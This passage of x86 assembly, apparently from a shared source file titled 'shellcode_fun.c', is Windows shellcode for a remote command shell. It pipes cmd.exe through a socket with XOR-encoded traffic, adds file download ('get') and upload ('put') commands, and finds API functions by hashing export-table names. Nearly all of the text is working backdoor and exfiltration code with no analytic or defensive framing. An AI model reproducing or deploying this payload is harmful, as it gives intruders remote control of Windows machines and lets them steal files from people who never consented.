📄 shellcode_fun.c
字号:
push 0x5C2E5C5C ; "\\.\pipe\0" mov edi, esp xor eax, eax push eax push eax push eax push eax push 0xff ; UNLIMITED_INSTANCES push eax ; TYPE_BYTE|READMODE_BYTE|WAIT push 0x40000003 ; ACCES_DUPLEX|FLAG_OVERLAPPED push edi ; pip="\\.\pipe\0" call dword ptr [esi+_CreateNamedPipeA] mov [esi+_hout1], eax xor eax, eax push eax push eax push 3 ; OPEN_EXISTING push ebx ; lap push eax push 0x02000000 ; MAXIMUM_ALLOWED push edi ; pip="\\.\pipe\0" call dword ptr [esi+_CreateFileA] mov [esi+_hout0], eax push 646D63h ; "cmd" lea edx, [esp] sub esp, 54h mov edi, esp push 14h pop ecx xor eax, eax stack_zero: mov [edi+ecx*4], eax loop stack_zero mov byte ptr [edi+10h], 44h ; si.cb = sizeof(si) inc byte ptr [edi+3Ch] inc byte ptr [edi+3Dh] ; si.flg=USESHOWWINDOW|USESTDHANDLES push [esi+_hin1] pop ebx mov [edi+48h], ebx ; si.stdinput push [esi+_hout0] pop ebx mov [edi+4Ch], ebx ; si.stdoutput mov [edi+50h], ebx ; si.stderror lea eax, [edi+10h] push edi push eax push ecx push ecx push ecx push 1 ; inherit=TRUE push ecx push ecx push edx ; "cmd" push ecx call dword ptr [esi+_CreateProcessA] push [edi] pop dword ptr [esi+_pi0] push [edi+4] pop dword ptr [esi+_pi1] push [esi+_hin1] call dword ptr [esi+_CloseHandle] push [esi+_hout0] call dword ptr [esi+_CloseHandle] add esp, 0x6C ; free sa struct and "\\.\pipe\0" string and si struct xor eax, eax push eax push 1 push 1 push eax call dword ptr [esi+_CreateEventA] mov [esi+_epip], eax xor ebx, ebx mov [esi+_lap+0x0C], ebx mov [esi+_lap+0x10], eax call dword ptr [esi+_WSACreateEvent] mov [esi+_esck], eax mov dword ptr [esi+_flg], 0k1: push 0x21 ; FD_READ|FD_CLOSE push [esi+_esck] push [esi+_hsck] call dword ptr [esi+_WSAEventSelect] xor eax, eax dec eax push eax inc eax push eax lea ebx, [esi+_epip] push ebx push 2 call dword ptr [esi+_WaitForMultipleObjects] push eax lea ebx, [esi+_sbuf] push ebx push [esi+_esck] push [esi+_hsck] call dword ptr [esi+_WSAEnumNetworkEvents] push 0 push dword ptr [esi+_esck] push dword ptr [esi+_hsck] call dword ptr [esi+_WSAEventSelect] push 0 push esp push 0x8004667e push [esi+_hsck] call dword ptr [esi+_ioctlsocket] pop eax pop ecx ; jecxz k2 dec ecx jnz k5 push 0 push 0x40 lea edx, [esi+_sbuf] push edx push [esi+_hsck] call dword ptr [esi+_recv] lea edx, [esi+_sbuf] push eax pop ecx call xor_data //+------------------------------------------- // Add file download and upload function // 2004-06-09 // // san //+------------------------------------------- cmp dword ptr [esi+_sbuf], 0x20746567 ; "get " jz get_file cmp dword ptr [esi+_sbuf], 0x20747570 ; "put " jz put_file restore: push 0 lea ebx, [esi+_cnt] push ebx push eax ; size lea ebx, [esi+_sbuf] push ebx push [esi+_hin0] call [esi+_WriteFile] k2: mov ecx, [esi+_flg] jecxz k3 push eax lea ebx, [esi+_cnt] push ebx lea ebx, [esi+_lap] push ebx push [esi+_hout1] call dword ptr [esi+_GetOverlappedResult] xchg eax, ecx jecxz k5 jmp k4 k3: lea ebx, [esi+_lap] push ebx lea ebx, [esi+_cnt] push ebx push 0x40 lea ebx, [esi+_pbuf] push ebx push [esi+_hout1] call dword ptr [esi+_ReadFile] inc dword ptr [esi+_flg] test eax, eax jz k1 k4: lea edx, [esi+_pbuf] push [esi+_cnt] pop ecx call xor_data dec dword ptr [esi+_flg] push 0 mov ebx, [esi+_cnt] push ebx lea ebx, [esi+_pbuf] push ebx push [esi+_hsck] call dword ptr [esi+_send] jmp k1k5: push [esi+_pi0] call dword ptr [esi+_TerminateProcess] push [esi+_pi0] push [esi+_pi1] push [esi+_hout1] push [esi+_hin0] call dword ptr [esi+_CloseHandle] call dword ptr [esi+_CloseHandle] call dword ptr [esi+_CloseHandle] call dword ptr [esi+_CloseHandle] push [esi+_hsck] call dword ptr [esi+_closesocket] xor eax, eax dec eax push eax call dword ptr [esi+_TerminateProcess]get_file: mov byte ptr [esi+_sbuf+eax-1], 0 lea edx, [esi+_sbuf+4] ; "get " filename xor eax, eax push eax push eax push 3 ; OPEN_EXISTING push eax ; lap push eax push 0x02000000 ; MAXIMUM_ALLOWED push edx call dword ptr [esi+_CreateFileA] mov [esi+_hout0], eax transfer: push 0 ; null or &lap lea edx, [esi+_cnt] push edx ; read size actualy push 0x40 ; read size lea edx, [esi+_pbuf] push edx push [esi+_hout0] call dword ptr [esi+_ReadFile] mov ecx, [esi+_cnt] jecxz transfer_finish ; None to read lea edx, [esi+_pbuf] call xor_data push 0 push [esi+_cnt] lea edx, [esi+_pbuf] push edx push [esi+_hsck] call dword ptr [esi+_send] jmp transfer transfer_finish: push [esi+_hout0] call dword ptr [esi+_CloseHandle] jmp k1put_file: mov byte ptr [esi+_sbuf+eax-1], 0 lea edx, [esi+_sbuf+4] ; filename after "put " xor eax, eax push eax push eax push 2 ; CREATE_ALWAYS push eax ; lap push eax push 0x02000000 ; MAXIMUM_ALLOWED push edx call dword ptr [esi+_CreateFileA] mov [esi+_hout0], eax upload: push 0 push 0x40 lea edx, [esi+_pbuf] push edx push [esi+_hsck] call dword ptr [esi+_recv] lea edx, [esi+_pbuf] push eax pop ecx call xor_data push 0 lea edx, [esi+_cnt] push edx push eax lea edx, [esi+_pbuf] push edx push [esi+_hout0] call dword ptr [esi+_WriteFile] push 0 push esp push 4004667Fh push [esi+_hsck] call dword ptr [esi+_ioctlsocket] pop ecx jecxz upload_finish jmp upload upload_finish: push [esi+_hout0] call dword ptr [esi+_CloseHandle] mov byte ptr [esi+_sbuf], 0x0a push 1h pop eax jmp restorexor_data: dec edx xor_work: xor byte ptr [edx+ecx], Xor_key loop xor_work retfind_hashfunc_addr: push ecx push esi mov esi, [ebp+3Ch] ; e_lfanew mov esi, [esi+ebp+78h] ; ExportDirectory RVA add esi, ebp ; rva2va push esi mov esi, [esi+20h] ; AddressOfNames RVA add esi, ebp ; rva2va xor ecx, ecx dec ecx find_start: inc ecx lodsd add eax, ebp xor ebx, ebx hash_loop: movsx edx, byte ptr [eax] cmp dl, dh jz short find_addr ror ebx, 7 ; hash add ebx, edx inc eax jmp short hash_loop find_addr: cmp ebx, [edi] ; compare to hash jnz short find_start pop esi ; ExportDirectory mov ebx, [esi+24h] ; AddressOfNameOrdinals RVA add ebx, ebp ; rva2va mov cx, [ebx+ecx*2] ; FunctionOrdinal mov ebx, [esi+1Ch] ; AddressOfFunctions RVA add ebx, ebp ; rva2va mov eax, [ebx+ecx*4] ; FunctionAddress RVA add eax, ebp ; rva2va stosd ; function address save to [edi] pop esi pop ecx retn locate_addr: call func_startPROC_END //C macro to end proc }}⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -